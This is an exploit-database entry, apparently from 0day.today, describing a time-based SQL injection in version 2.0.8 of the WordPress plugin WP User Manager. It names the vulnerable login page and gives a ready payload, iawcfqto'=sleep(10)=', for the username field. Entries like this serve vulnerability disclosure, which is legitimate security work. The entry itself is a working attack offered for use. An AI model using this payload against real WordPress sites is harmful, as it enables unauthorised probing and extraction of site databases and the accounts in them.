WordPress WP User Manager 2.0.8 SQL Injection Vulnerability

2018-11-12T00:00:00
ID 1337DAY-ID-31571
Type zdt
Reporter Socket_0x03
Modified 2018-11-12T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title: WP User Manager v2.0.8 (WordPress Plugin) - Time-Based SQL Injection

 # Author: Socket_0x03 (Alvaro J. Gene)

____________________________________________________________________________________


 # Software Link: https://wordpress.org/plugins/wp-user-manager

 # Plugin: WP User Manager

 # Version: v2.0.8 (last version)

 # File: login

 # Input: username

 # Language: This application is available in English language.

 # Plugin Description: A WordPress plugin to create user profiles with registration,
   login, password recovery, and other features.
   
____________________________________________________________________________________


 #  Time-Based SQL Injection:
 
    http://www.website.com/wordpress/index.php/login
    Username: iawcfqto'=sleep(10)='
    Password: password
    Click on Login


#  0day.today [2018-11-12]  #